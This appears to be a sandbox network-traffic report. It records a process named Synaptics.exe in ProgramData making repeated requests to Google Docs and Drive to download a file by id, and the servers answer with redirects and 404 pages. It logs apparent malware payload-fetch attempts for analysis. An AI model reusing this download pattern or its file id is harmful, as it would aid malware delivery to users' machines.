                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              89192.168.2.449882142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:27 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ohkq7mPnTIljkEXLcOHtXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              90192.168.2.449881142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:27 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-QxpcOisvgWcCGIDa4SrAPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              91192.168.2.449889142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:28 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-k09Y6MV-IxrODeQYGCNOXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              92192.168.2.449891142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7j1SQL4JDdilezfaPjD2nDzWt4kKQiO46GFwsr9pj72vTm7a7JsB5TP0F0FQ1i9S_jC5yVh2Q
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:28 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-jfa4umS9FLhKm9IemAt-5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 6d 34 4c 61 4a 4a 62 33 67 47 38 46 59 70 32 44 77 64 69 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="_m4LaJJb3gG8FYp2DwdilA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              93192.168.2.449890142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:28 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lBZBSDPo5-El8AbAD6huUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              94192.168.2.449892142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:28 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5p634Q_jv4AS5kkzUa4hr5VywC0_onH_88fOzWAciCGWBu6Cv_8aAwUXyLuZTgQLpK
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:28 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-58iI0InlkdYM1SC44EJxpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:28 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:28 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 76 73 4e 35 55 4d 55 58 71 45 5f 49 42 73 38 57 45 43 4a 45 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="BvsN5UMUXqE_IBs8WECJEA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:28 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              95192.168.2.449901142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-FdjMClCrIrF_wq4rTNeNsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              96192.168.2.449902142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-gC4fpGvrlHjJKOHdk7D5lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              97192.168.2.449904142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6hnqh51GdKCNBnFWaW1Sglle7U5nvTvTnVp0PrGqIPVlGmUGZhmQg7z4stk8F-ruKIjyZmObs
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:29 GMT
